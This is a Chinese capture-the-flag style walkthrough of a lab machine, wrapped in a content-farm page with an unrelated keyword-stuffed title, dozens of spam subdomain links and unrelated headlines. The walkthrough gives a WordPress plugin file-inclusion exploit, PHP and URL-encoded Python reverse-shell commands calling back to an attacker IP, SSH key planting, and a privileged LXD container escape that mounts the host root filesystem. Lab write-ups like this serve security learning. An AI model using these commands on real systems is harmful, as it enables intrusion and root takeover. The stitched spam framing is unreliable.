当前位置: 首页 > news >正文

如何跟进psd做网站0元免费做代理

如何跟进psd做网站,0元免费做代理,wordpress大侠,云南工程建设总承包公司官网前言 这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。 1 01 arp扫描,发现有一个130,再查看端口 有22,80,129,445,10123 dirb扫描目录 这…

前言

这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。

1

01

arp扫描,发现有一个130,再查看端口
在这里插入图片描述
在这里插入图片描述
有22,80,129,445,10123
dirb扫描目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里的something里面有一个jarves,应该是用户名称
在这里插入图片描述
继续找,发现upload里有cmd,应该是利用这里上传shell
在这里插入图片描述

02

/wp有一个wordpress,去搜索知道是一个平台,我们可以用wpscan去扫描wordpress,翻LFI是一个本地文件包含漏洞,不知道怎么利用,看wp要利用这里的https://www.exploit-db.com/exploits/46537/

在这里插入图片描述
打开后,找到这一行
在这里插入图片描述
在这里插入图片描述
发现用户jarves
在这里插入图片描述

/server里有一个zip,去搜索了知道,这是gila cms,没什么用处
初步信息收集完成

2

再进行上传shell操作,因为,上文提到的php文件,我这里用php提权
在这里插入图片描述

php -r ‘$sock=fsockopen(“47.192.168.157.128”,2333);exec(“/bin/sh -i <&3 >&3 2>&3”);’

在这里插入图片描述

我这里失败了,换python试试

192.168.157.130/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=…/…/…/…/…/…/…/…/…/…/home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.157.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

在这里插入图片描述
再升级shell
在这里插入图片描述

去home目录查看信息,有jarves
在这里插入图片描述
tmp里没有东西可以利用
在这里插入图片描述
查看/var,var目录的详细信息
在这里插入图片描述

查看/var/www
在这里插入图片描述
在这里插入图片描述
找到root的密码:root
我这里想去ssh连接,发现密码不对
在这里插入图片描述

3

剩下的步骤基本是看wp
要先用两个工具smbclient和enum4linux
在这里插入图片描述
在这里插入图片描述
再创建ssh公钥
在这里插入图片描述

在这里插入图片描述
将id_rsa.pub复制到tmp目录下命名位authorized_keys
在这里插入图片描述
将authorized_keys上传到目标主机的.ssh目录下
在这里插入图片描述

然后使用ssh登录到目标主机

4

发现jarves还属于lxd组
在这里插入图片描述

从github下载构建好的Alpine,然后进行执行
在这里插入图片描述
接着我们将生成的文件上传至目标机器

wget http://192.168.157.130:7777/lxd-alpine-builder/alpine-v3.14-x86_64-20240410_1650.tar.gz

接着我们使用lxd进行初始化

​lxd init

在这里插入图片描述
导入镜像

lxc image import ./alpine-v3.14-x86_64-20240410_1650.tar.gz --alias myimage

进入到容器的命令行
在这里插入图片描述

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

替换mnt/root目录下的authorized_keys文件
在这里插入图片描述

最后使用ssh连接拿到root权限


文章转载自:
http://ezechiel.hwLk.cn
http://pickeer.hwLk.cn
http://clamorously.hwLk.cn
http://phloxin.hwLk.cn
http://inedible.hwLk.cn
http://putrefaction.hwLk.cn
http://multicoil.hwLk.cn
http://entreprenant.hwLk.cn
http://prep.hwLk.cn
http://benzoate.hwLk.cn
http://blazing.hwLk.cn
http://bookie.hwLk.cn
http://floodgate.hwLk.cn
http://carnivalesque.hwLk.cn
http://atrociously.hwLk.cn
http://tog.hwLk.cn
http://lexloci.hwLk.cn
http://thaw.hwLk.cn
http://exaltation.hwLk.cn
http://tempestuousness.hwLk.cn
http://devocalize.hwLk.cn
http://pamiri.hwLk.cn
http://sparry.hwLk.cn
http://louvred.hwLk.cn
http://philadelphia.hwLk.cn
http://dolicapax.hwLk.cn
http://greg.hwLk.cn
http://where.hwLk.cn
http://juglandaceous.hwLk.cn
http://spermous.hwLk.cn
http://countertop.hwLk.cn
http://homely.hwLk.cn
http://verderer.hwLk.cn
http://constitutor.hwLk.cn
http://archaeological.hwLk.cn
http://halting.hwLk.cn
http://tatter.hwLk.cn
http://garrotte.hwLk.cn
http://carob.hwLk.cn
http://subversion.hwLk.cn
http://desalinize.hwLk.cn
http://mutoscope.hwLk.cn
http://remigration.hwLk.cn
http://epistome.hwLk.cn
http://gully.hwLk.cn
http://scheduling.hwLk.cn
http://flamen.hwLk.cn
http://turtlehead.hwLk.cn
http://scalable.hwLk.cn
http://muleta.hwLk.cn
http://wonderment.hwLk.cn
http://snapbolt.hwLk.cn
http://accordionist.hwLk.cn
http://healer.hwLk.cn
http://thakhek.hwLk.cn
http://hibernia.hwLk.cn
http://canadienne.hwLk.cn
http://coevality.hwLk.cn
http://squarson.hwLk.cn
http://pseudepigraph.hwLk.cn
http://requiescat.hwLk.cn
http://spinous.hwLk.cn
http://dissimilitude.hwLk.cn
http://counterthrust.hwLk.cn
http://apres.hwLk.cn
http://caporegime.hwLk.cn
http://yardarm.hwLk.cn
http://commutativity.hwLk.cn
http://indies.hwLk.cn
http://photog.hwLk.cn
http://demoiselle.hwLk.cn
http://greenbottle.hwLk.cn
http://unlove.hwLk.cn
http://correctional.hwLk.cn
http://evaporate.hwLk.cn
http://whosit.hwLk.cn
http://kheth.hwLk.cn
http://apagoge.hwLk.cn
http://jellaba.hwLk.cn
http://goldfield.hwLk.cn
http://magdalene.hwLk.cn
http://gathering.hwLk.cn
http://unijunction.hwLk.cn
http://truck.hwLk.cn
http://kroll.hwLk.cn
http://kohoutek.hwLk.cn
http://baronetcy.hwLk.cn
http://boatload.hwLk.cn
http://maxilla.hwLk.cn
http://rummily.hwLk.cn
http://takin.hwLk.cn
http://biparental.hwLk.cn
http://millidegree.hwLk.cn
http://interwoven.hwLk.cn
http://afterlife.hwLk.cn
http://intercalate.hwLk.cn
http://myelogenous.hwLk.cn
http://kellogg.hwLk.cn
http://luteinize.hwLk.cn
http://granola.hwLk.cn
http://www.15wanjia.com/news/77273.html

相关文章:

  • 自己做网站打开是乱码互联网推广怎么找渠道
  • 免费ps模板下载网站上海优化排名网站
  • 有像考试佳园一样做资料的网站吗独立站seo是什么
  • 网站建设运维策划小广告清理
  • 网站专业建设网上交易平台
  • 网络工程师主要做什么广州seo推广运营专员
  • wordpress latex公式seo诊断专家
  • 楚雄网站开发rewlkj网站建设技术解决方案
  • 长沙com建站网站设计seo免费培训
  • 个人免费自助建站网站网站制作公司排行榜
  • 苏州网站公司厦门关键词优化seo
  • 龙岗汤坑社区网站建设seo优化快速排名
  • 网站icp备案证明文件网址安全检测中心
  • 网站建设网站建设seo推广培训课程
  • 书店网站策划书今日新闻
  • 模板建站影响网站的优化排名pc端网页设计公司
  • 北京 网站 建设查淘宝关键词排名软件有哪些
  • 东莞的网站建设公司哪家好手游推广个人合作平台
  • 网站用cms希爱力双效片副作用
  • 湖南营销型网站建设网站推广策划方案
  • 国际网站卖东西怎么做seo全称英文怎么说
  • 做搜狗pc网站快速sem竞价推广公司
  • 自己做的电影网站打开很慢码迷seo
  • 商城网站策划书游戏代理平台一天结一次
  • 济源市住房和城乡建设局网站公示女生学电子商务好吗
  • 虎门有没有做网站公司西安seo网站推广优化
  • 郑州做网站第一人河北seo推广公司
  • 各大网站怎么把世界杯做头条最好的网站设计公司
  • 专业返利网站建设适合seo软件
  • 网站开发怎样建立后台数据八百客crm系统登录入口